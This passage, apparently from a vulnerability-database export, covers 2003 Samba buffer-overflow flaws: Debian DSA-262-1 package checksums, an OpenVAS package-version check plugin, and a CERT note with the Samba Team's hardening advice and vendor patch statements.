40e0ab43c7c2a05b4321acfe5b3ae92a\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 535058 641d95a5c5a27922448fad10b9b8faf5\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 930150 ffb594a4b2b89818b05fab828d3cbc2f\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 446010 91462c2c5f11ded29d923b1056d4a7f5\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 793204 d82a61e9731f157a20f26748e3301b5a\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 993054 27c24ec813a504eb098f3c6bff1d0648\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 388574 290c9c668bc96ea9d05713e3d6fa0301\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 499736 bf6b7464efc203709fee5bcaf5de2f4d\n\n ia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 3487288 620b57d229cababb19cf11292343a4f5\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 695242 c2801159a9ae051c27507bbc102115b9\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 1097430 43756ff78b0400a834b8a818399c2e30\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 1328162 1de9184ba777c75e8d64d54cdaeeda21\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 1248348 90d5fa39afefc9a48212a9bf06bac0db\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 1281494 70a87465a6370a37bb3add200a20d806\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 461376 cdc7a75cbe2a4ca4aea3151190f975d4\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 553364 373b3d6335bc8898195703be951d2c35\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_ia64.deb\n Size/MD5 checksum: 624498 f3f89a26c5efba738d74edb5a898cac1\n\n mips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 1027468 fbb755a07a56430713f039b4926ac50d\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 569254 a293262cf7c26940df99859b296d4305\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 1078026 a149c42542eda0b32ccfb69131e2238c\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 910160 4f994a4ed297fb00bc2cd015c26a0cc4\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 395814 1b4cd57c7ce2bfbe1fde054ebbd43c8d\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 580840 ec476202e7871294587777f2a2c84b8c\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 2803220 8ff0254ff5f06a73d2e0ea7da445e897\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 459092 5be701b06e8a8cd2743d46e9fc51ff77\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_mips.deb\n Size/MD5 checksum: 1088036 d0c0c9ee281aacaff919b27f6c9d1b34\n\n mipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 1014748 56509d2718ca53e71f91a4be3abe41ea\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 1075490 c225c5f47f3265e7993aa5c8a61263c4\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 576358 41e83b24d1397cb8f110b384c7d92abc\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 453662 3b167bf61b72b025dde36b128e743c71\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 2763676 200e4a3cc98a76029a91660053a8af51\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 562180 b9be983799efeebedae75b92cbe0ac1f\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 896746 4542a9d8768065507f8f095fced8be53\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 1071216 647dff52bda6360f48955a872e58c1af\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_mipsel.deb\n Size/MD5 checksum: 391904 d5dfa893c8e6a014b4fbf39c4adada22\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 545998 2189d56eb150c7854160198e2290c92f\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 408620 13d6efd82e9c3667219171a4e05eff58\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 475424 4ed09f39f249dc22efd38d2e830985b8\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 2607232 93845aefa1341db335442745fce21223\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 852294 59421f785ec7f732f6db592441d36292\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 560704 86cb4acb79c9cbe46564612f04316027\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 1021260 4f9d182203cc960d403e3baf6d2ca700\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 1036430 8f48a7fae3a659a87980d15eb2e6e31b\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_powerpc.deb\n Size/MD5 checksum: 1001326 b3108080930f871f11b6e8e5dd27a9bf\n\n s390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 2495850 bec14c674dfb41568fafba16a97a811d\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 1007974 5b1dc0d8a8bb2ac1c12f0b251227bc51\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 982464 dbb0ce460a451678c67f76c6651ce605\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 833018 769bfaff5073e6781c22328364f253be\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 965494 dc884757e2802825d73a3b96aec742c8\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 402948 63a7dd67f7b2a146f605be2caab2c268\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 469722 7a118704ee394d6db0341d00b5bea9c3\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 537542 ccb4499ae9c39ce6f3062f20f5a2fc5a\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_s390.deb\n Size/MD5 checksum: 526406 93cfd2a823cdf2b8777f850adcf1b2e4\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 985124 d67741960205804cc13b484faff1cbe1\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 400260 f7af05064c5e6a71c4e02508d33166f6\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 523622 0263afefd2b8996020606bd24ca31113\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 1011064 bc53ee49e2bc41c41ae72728c7de6e40\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 829240 23b17ba07f9632b1aa1773475b5efbf3\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 2513176 7d3cd01177cb74e80fcba81999420246\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 461672 11f5846a4876eb91bd88f8e829803091\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 964150 572b0a10fcddd6786c9b5c09d80953f2\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_sparc.deb\n Size/MD5 checksum: 543372 4790b19c4feea9603d444970d61f45b5\n\n- -- \n- ----------------------------------------------------------------------------\nDebian Security team &lt;team@security.debian.org&gt;\nhttp://www.debian.org/security/\nMailing-List: debian-security-announce@lists.debian.org\n\n", "modified": "2003-03-15T00:00:00", "published": "2003-03-15T00:00:00", "id": "DEBIAN:DSA-262-1:0FA36", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00045.html", "title": "[SECURITY] [DSA-262-1] samba security fix", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update to samba\nannounced via advisory DSA 262-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53860", "id": "OPENVAS:53860", "title": "Debian Security Advisory DSA 262-1 (samba)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_262_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 262-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of the SuSE security audit team found two problems\nin samba, a popular SMB/CIFS implementation. The problems are:\n\n* a buffer overflow in the SMB/CIFS packet fragment re-assembly code\nused by smbd. Since smbd runs as root an attacker can use this to\ngain root access to a machine running smbd.\n\n* the code to write reg files was vulnerable for a chown race which made\nit possible for a local user to overwrite system files\n\nBoth problems have been fixed in upstream version 2.2.8, and version\n2.2.3a-12.1 of package for Debian GNU/Linux 3.0/woody.\";\ntag_summary = \"The remote host is missing an update to samba\nannounced via advisory DSA 262-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20262-1\";\n\nif(description)\n{\n script_id(53860);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0085\", \"CVE-2003-0086\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 262-1 (samba)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"swat\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smbfs\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"winbind\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2.2.3a-12.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2019-10-09T19:53:08", "bulletinFamily": "info", "description": "### Overview \n\nSamba contains several buffer overflow vulnerabilitites. At least one of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service.\n\n### Description \n\nSamba is a widely used open-source implementation of Server Message Block (SMB)/Common Internet File System (CIFS). Samba-TNG is a forked development branch of Samba. SMB/CIFS is used in Microsoft Windows to provide file and print services. Samba versions prior to 2.2.8a and Samba-TNG versions prior to 0.3.2 contain several buffer overflow vulnerabilities. \n\nA stack overflow in the function trans2open() (in trans2.c) has been assigned [CAN-2003-0201](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201>). An exploit for this vulnerability has been publicly released. \n \nAfter the trans2open() issue was reported, the Samba Team discovered and fixed several other buffer overflow vulnerabilities (in statcache.c, reply.c, and password.c). These vulnerabilities have been assigned [CAN-2003-0196](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0196>). \n \nThese vulnerabilities are different than the packet fragment re-assembly problem discussed in [VU#298233](<http://www.kb.cert.org/vuls/id/298233>) ([CAN-2003-0085](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0085>)). \n \n--- \n \n### Impact \n\nAn unauthenticated, remote attacker could execute arbitrary code or cause a denial of service. The Samba daemon (smbd) runs with root privileges, so an attacker could gain complete control of a vulnerable system. \n \n--- \n \n### Solution \n\n**Patch or Upgrade** \n \nUpgrade or apply a patch as specified by your vendor. \n \nUpgrade or patch to Samba 2.2.8a or Samba-TNG 0.3.2. \n \n--- \n \n**Block or Restrict Access** \n \nBlock or restrict access to Samba services from untrusted networks such as the Internet. The Samba Team [announcement](<http://lists.samba.org/pipermail/samba-announce/2003-March/000063.html>) for version 2.2.8 contains excellent recommendations for restricting access to Samba servers: \n \n`************************************ \nProtecting an unpatched Samba server \n************************************ \n \nSamba Team, March 2003 \n \nThis is a note on how to provide your Samba server some protection against the recently discovered remote security hole if you are unable to upgrade to the fixed version immediately. Even if you do upgrade you might like to think about the suggestions in this note to provide you with additional levels of protection. \n \n \nUsing host based protection \n---------------------------` \n` \nIn many installations of Samba the greatest threat comes for outside your immediate network. By default Samba will accept connections from any host, which means that if you run an insecure version of Samba on a host that is directly connected to the Internet you can be especially vulnerable. \n \nOne of the simplest fixes in this case is to use the 'hosts allow' and 'hosts deny' options in the Samba smb.conf configuration file to only allow access to your server from a specific range of hosts. An example might be:` \n` \n`\n\n`hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24 \nhosts deny = 0.0.0.0/0` \n`The above will only allow SMB connections from 'localhost' (your own computer) and from the two private networks 192.168.2 and 192.168.3. All other connections will be refused connections as soon as the client sends its first packet. The refusal will be marked as a 'not listening on called name' error. \n` \n` \nUsing interface protection \n--------------------------` \n` \nBy default Samba will accept connections on any network interface that it finds on your system. That means if you have a ISDN line or a PPP connection to the Internet then Samba will accept connections on those links. This may not be what you want. \n \nYou can change this behavior using options like the following: \n` \n\n\n`interfaces = eth* lo \nbind interfaces only = yes` \n`that tells Samba to only listen for connections on interfaces with a name starting with 'eth' such as eth0, eth1, plus on the loopback interface called 'lo'. The name you will need to use depends on what OS you are using. In the above I used the common name for ethernet adapters on Linux. \n \nIf you use the above and someone tries to make a SMB connection to your host over a PPP interface called 'ppp0', they will get a TCP connection refused reply. In that case no Samba code is run at all as the operating system has been told not to pass connections from that interface to any process. \n` \n` \nUsing a firewall \n----------------` \n` \nMany people use a firewall to deny access to services that they don't want exposed outside their network. This can be a very good idea, although I would recommend using it in conjunction with the above methods so that you are protected even if your firewall is not active for some reason. \n \nIf you are setting up a firewall then you need to know what TCP and UDP ports to allow and block. Samba uses the following: \n` \n\n\n`UDP/137 - used by nmbd \nUDP/138 - used by nmbd \nTCP/139 - used by smbd \nTCP/445 - used by smbd` \n`The last one is important as many older firewall setups may not be aware of it, given that this port was only added to the protocol in recent years. \n` \n` \nUsing a IPC$ share deny \n-----------------------` \n` \nIf the above methods are not suitable, then you could also place a more specific deny on the IPC$ share that is used in the recently discovered security hole. This allows you to offer access to other shares while denying access to IPC$ from potentially untrustworthy hosts. \n \nTo do that you could use: \n` \n\n\n`[ipc$]``hosts allow = 192.168.115.0/24 127.0.0.1 \nhosts deny = 0.0.0.0/0` \n`this would tell Samba that IPC$ connections are not allowed from anywhere but the two listed places (localhost and a local subnet). Connections to other shares would still be allowed. As the IPC$ share is the only share that is always accessible anonymously this provides some level of protection against attackers that do not know a username/password for your host.` \n` \nIf you use this method then clients will be given a 'access denied' reply when they try to access the IPC$ share. That means that those clients will not be able to browse shares, and may also be unable to access some other resources. \n \nI don't recommend this method unless you cannot use one of the other methods listed above for some reason. \n` \n` \nUpgrading Samba \n---------------` \n` \nOf course the best solution is to upgrade Samba to a version where the bug has been fixed. If you wish to also use one of the additional measures above then that would certainly be a good idea. \n \nPlease check regularly on `[`http://www.samba.org/`](<http://www.samba.org/>)` for updates and important announcements.` \n--- \n \n### Vendor Information\n\n267873\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apple Computer Inc.\n\nNotified: April 09, 2003 Updated: April 11, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nApple has released Mac OS X 10.2.5 which includes the patch from the Samba team for this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [announcement](<http://archives:archives@lists.apple.com/mhonarc/security-announce/msg00028.html>) for Mac OS X 10.2.5.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Conectiva\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CLSA-2003:624](<http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000624&idioma=en>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Debian\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [DSA-280](<http://www.debian.org/security/2003/dsa-280>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ FreeBSD\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FreeBSD-SN-03:01](<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-03:01.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ Gentoo Linux\n\nUpdated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE-----`\n\n`Hash: SHA1` \n \n`- - ---------------------------------------------------------------------` \n`GENTOO LINUX SECURITY ANNOUNCEMENT 200304-02` \n`- - ---------------------------------------------------------------------` \n \n` PACKAGE : samba` \n` SUMMARY : Buffer overflow` \n` DATE : 2003-04-09 08:44 UTC` \n` EXPLOIT : remote` \n`VERSIONS AFFECTED : <2.2.8a` \n` FIXED VERSION : >=2.2.8a` \n` CVE : CAN-2003-0201` \n \n`- - ---------------------------------------------------------------------` \n \n`- From advisory:` \n \n`\"An anonymous user can gain remote root access due to a buffer overflow caused` \n`by a StrnCpy() into a char array (fname) using a non-constant length` \n`(namelen).\"` \n \n`Read the full advisory at:` \n`[http://marc.theaimsgroup.com/?l=bugtraq&m=104972664226781&w=2](<http://marc.theaimsgroup.com/?l=bugtraq&m=104972664226781&w=2>)` \n \n`SOLUTION` \n \n`It is recommended that all Gentoo Linux users who are running` \n`net-fs/samba upgrade to samba-2.2.8a as follows:` \n \n`emerge sync` \n`emerge samba` \n`emerge clean` \n \n`- - ---------------------------------------------------------------------` \n`aliz@gentoo.org - GnuPG key is available at ``<http://cvs.gentoo.org/~aliz>` \n`- - ---------------------------------------------------------------------` \n`-----BEGIN PGP SIGNATURE-----` \n`Version: GnuPG v1.2.1 (GNU/Linux)` \n \n`iD8DBQE+k91YfT7nyhUpoZMRAtowAKDAgOYrqeXDRilQkDN/SBXJegJ6RgCgsSRV` \n`ni8x1vst4U3vttassFEdpfA=` \n`=wFgE` \n`-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ Hewlett-Packard Company\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n` --------------------------------------- \nSource: \n` \n` Source: HEWLETT-PACKARD COMPANY \nSoftware Security Response Team \n` \n \n` Published: SECURITY BULLETIN \n` \n` HPSBUX0304-254 \n` \n` Originally issued: 09 April 2003 \n` \n` SSRT3536 Potential Security Vulnerability in \nCIFS/9000 Server \n` \n` CIFS/9000 Server is potentially vulnerable to altered \nSMB/CIFS network messages. \n` \n` Note: Although having similar descriptions, this is a \ndifferent vulnerability from that described in \nHPSBUX0303-251 SSRT3509 Potential Security \nVulnerability in CIFS/9000 Server. \nUsing the fix described in this bulletin will correct both \nvulnerabilities. \n` \n` NOTE: Using your itrc account security bulletins can be \nfound here: \n`[`http://itrc.hp.com/cki/bin/doc.pl/screen=ckiSecurityBulletin`](<http://itrc.hp.com/cki/bin/doc.pl/screen=ckiSecurityBulletin>)` \n` \n` Note: The following are not vulnerable: \n-------------------------------------------- \n` \n` HP OpenVMS \nHP NonStop Servers \nHP Secure Web Servers for HP Tru64 UNIX \nHP Secure Web Servers for HP Tru64 OpenVMS \n` \n \n`To report potential security vulnerabilities in HP software, \nsend an E-mail message to: `[`mailto:security-alert@hp.com`](<mailto:security-alert@hp.com>)` \n` \n \n \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.1 \n` \n`iQA/AwUBPpSZhDnTu2ckvbFuEQK9vQCeKGkqYmGB1hvQktsd4zzCVbUTPjUAoN1V \nrYSaNyLeXqcqGvdb0U+hIwVa \n=59Tc \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ IBM\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`The AIX Toolbox for Linux ships with Samba. \n` \n`Security fixes for the issues discussed in CERT Vulnerability Note \nVU#267873 have been incorporated into Samba 2.2.7-4 and is available for \ndownload from: \n` \n[` ``ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/`](<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/samba/samba-2.2.7-4.aix4.3.ppc.rpm>) \n[` ppc/samba/samba-2.2.7-4.aix4.3.ppc.rpm`](<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/samba/samba-2.2.7-4.aix4.3.ppc.rpm>)` \n` \n`Note that the URL given spans two lines. \n` \n`This download also contains fixes for the issues discussed in CERT \nVulnerability Note VU#298233 \n` \n`Please note these items are shipped \"as is\" and are unwarranted. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.1 (MingW32) \n` \n`iD8DBQE+lIBlcnMXzUg7txIRApmHAKCSlysEH5U3Ibs6cInZbqBhUrabTgCfWmJp \nzCwi/cRcKLx8JzXDy6JJVwo= \n=/OXU \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ MandrakeSoft\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MDKSA-2003:044](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:044>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ MontaVista Software\n\nNotified: April 09, 2003 Updated: April 